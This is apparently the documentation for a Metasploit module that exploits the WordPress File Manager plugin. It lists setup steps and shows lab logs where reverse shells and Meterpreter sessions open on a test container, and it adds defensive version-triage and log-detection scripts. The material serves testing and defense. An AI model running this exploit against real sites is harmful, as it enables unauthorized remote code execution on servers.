metasploit-gs/documentation/modules/exploit/multi/http/wp_file_manager_rce.md

Vulnerable Application

Get a copy of version 6.0 of the plugin from https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip.

Versions 6.0 through 6.8 are vulnerable. Versions below 6.0 are not affected, and version 6.9 contains the fix.
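The module learns the installed version from the plugin's readme.txt (see the "Checking /wp-content/plugins/wp-file-manager/readme.txt" line in the scenarios below). The following defender-side triage script is an added example, not code from the Metasploit module or its documentation: it parses the "Stable tag" line of a readme.txt you already hold (a backup, a copy pulled by your own inventory tooling) and reports whether the version falls in the affected range given above (6.0 through 6.8; 6.9 fixed). The sample readme text embedded in it is constructed.

```python
"""Defender-side version triage for the File Manager (wp-file-manager) plugin.

Added example, not code from the Metasploit module or its documentation.
It parses the plugin's readme.txt (the same file the module inspects to
learn the version) and reports whether the "Stable tag" falls in the
range the documentation gives as vulnerable: 6.0 through 6.8, fixed in 6.9.
"""
import re
from typing import Optional, Tuple

Version = Tuple[int, ...]

# Range from the documentation above: 6.0 <= version < 6.9 is affected.
VULNERABLE_MIN: Version = (6, 0)
FIXED_IN: Version = (6, 9)

# WordPress plugin readme.txt files carry the released version as "Stable tag: X.Y".
# A tag such as "trunk" does not match, and is reported as unknown.
STABLE_TAG_RE = re.compile(r"^Stable tag:\s*([0-9]+(?:\.[0-9]+)*)\s*$",
                           re.IGNORECASE | re.MULTILINE)

# Constructed sample of a readme.txt header for a 6.0 install (not a real file).
SAMPLE_README = """=== File Manager ===
Requires at least: 4.0
Tested up to: 5.5
Stable tag: 6.0
"""


def _pad(version: Version) -> Version:
    """Pad to at least two components so (6,) compares like (6, 0)."""
    return version if len(version) >= 2 else version + (0,) * (2 - len(version))


def parse_version(text: str) -> Version:
    """'6.8.1' -> (6, 8, 1); '6' -> (6, 0)."""
    return _pad(tuple(int(part) for part in text.strip().split(".")))


def version_from_readme(readme: str) -> Optional[Version]:
    """Return the Stable tag version, or None if the file has no parsable tag."""
    match = STABLE_TAG_RE.search(readme)
    return parse_version(match.group(1)) if match else None


def is_vulnerable(version: Version) -> bool:
    """True when 6.0 <= version < 6.9 (tuple ordering makes 6.8.1 < 6.9 hold)."""
    return VULNERABLE_MIN <= _pad(tuple(version)) < FIXED_IN


def assess(readme: str) -> str:
    """Classify a readme.txt as 'vulnerable', 'not_vulnerable' or 'unknown'."""
    version = version_from_readme(readme)
    if version is None:
        return "unknown"
    return "vulnerable" if is_vulnerable(version) else "not_vulnerable"


if __name__ == "__main__":
    print(version_from_readme(SAMPLE_README), assess(SAMPLE_README))
```

Feed it the readme.txt from each WordPress install in your inventory; an "unknown" result (no numeric Stable tag) should be followed up by hand rather than treated as safe.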

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/multi/http/wp_file_manager_rce
  3. Do: set TARGETURI <target_uri>
  4. Do: set RHOSTS <target_ip>
  5. Optional: Do: set RPORT <target_port>
  6. Optional: Do: set PAYLOAD <payload> to switch payloads
  7. Optional: Do: set COMMAND <command> to switch elFinder commands used to exploit vulnerability
  8. Do: check to confirm existence of vulnerability or exploit to let the shells rain

Options

COMMAND

This vulnerability can be exploited in 2 ways:

  1. upload to directly upload a payload
  2. mkfile to create a file, then put to write arbitrary code to the newly created file

This option has 2 valid values:

  1. upload: exploit using the upload technique (default)
  2. mkfile+put: exploit using mkfile and put

Scenarios

Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using upload

msf6 > use exploit/multi/http/wp_file_manager_rce 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/aEiptb.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.3:35578) at 2020-10-12 20:19:16 +0800

meterpreter > sysinfo
Computer    : 6fc94cd81e93
OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter > 

Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, php/reverse_php payload, using upload

msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/XFVi0d.php
[*] Command shell session 2 opened (192.168.137.128:4444 -> 172.17.0.3:35598) at 2020-10-12 20:20:04 +0800

uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data

Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using mkfile+put

msf6 > use multi/http/wp_file_manager_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put 
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/unl8LJ.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 5 opened (192.168.137.128:4444 -> 172.17.0.3:38076) at 2020-10-15 17:42:00 +0800

meterpreter > sysinfo
Computer    : 6fc94cd81e93
OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter > 

Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, php/reverse_php payload, using mkfile+put

msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put 
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/DmFEWt.php
[*] Command shell session 6 opened (192.168.137.128:4444 -> 172.17.0.3:38096) at 2020-10-15 17:43:27 +0800

uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data
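Every scenario above ends the same way: a .php file appears under /wp-content/plugins/wp-file-manager/lib/files/ and is then requested over HTTP, whichever elFinder command (upload, or mkfile followed by put) wrote it. The following detection helper is an added example, not code from the Metasploit module or its documentation: it parses Apache/nginx combined-format access-log lines and flags any request for a PHP file in that directory, regardless of response status. The log lines embedded in it are constructed; the two file names reuse the ones shown in the scenarios, and the client addresses are documentation-range placeholders.

```python
"""Detection helper: flag web requests that execute PHP from the plugin's file store.

Added example, not part of the Metasploit module or its documentation.
Both techniques on this page (upload, and mkfile followed by put) leave a
.php file under /wp-content/plugins/wp-file-manager/lib/files/ which the
attacker then requests, so any request for a PHP file in that directory
is worth an alert. The log lines below are constructed, not captured.
"""
import re
from typing import Dict, List, Optional

PAYLOAD_DIR = "/wp-content/plugins/wp-file-manager/lib/files/"

# Extensions a typical PHP handler will execute, not only ".php".
PHP_EXT_RE = re.compile(r"\.ph(?:p[0-9]?|tml)$")

# Combined log format: client, identd, user, [time], "METHOD path proto", status, size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample access log (not captured from a real host).
SAMPLE_LOG = """\
192.0.2.10 - - [12/Oct/2020:12:19:10 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 200 4120
192.0.2.10 - - [12/Oct/2020:12:19:15 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/aEiptb.php HTTP/1.1" 200 0
198.51.100.7 - - [12/Oct/2020:12:20:01 +0000] "POST /wp-login.php HTTP/1.1" 302 0
192.0.2.10 - - [12/Oct/2020:12:20:04 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/XFVi0d.php?x=1 HTTP/1.1" 404 196
203.0.113.5 - - [12/Oct/2020:12:21:00 +0000] "GET /wp-content/plugins/wp-file-manager/lib/files/photo.jpg HTTP/1.1" 200 51234
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def is_payload_request(path: str) -> bool:
    """True for any request for a PHP file inside the plugin's file store."""
    clean = path.split("?", 1)[0].split("#", 1)[0]  # drop query string / fragment
    return clean.startswith(PAYLOAD_DIR) and PHP_EXT_RE.search(clean.lower()) is not None


def find_payload_requests(log_text: str) -> List[Dict[str, str]]:
    """Return parsed entries that request PHP from the file store, any status code.

    A 404 is kept on purpose: it still records an attempt against the directory.
    """
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_payload_request(entry["path"]):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in find_payload_requests(SAMPLE_LOG):
        print(hit["client"], hit["time"], hit["method"], hit["path"], hit["status"])
```

A request for the plugin's readme.txt from the same client shortly before a hit matches the version check the module performs in every scenario above, so correlating the two on client address sharpens the alert. On the filesystem side, the same directory should never contain PHP files, so an inventory of *.php under it is an equally simple indicator.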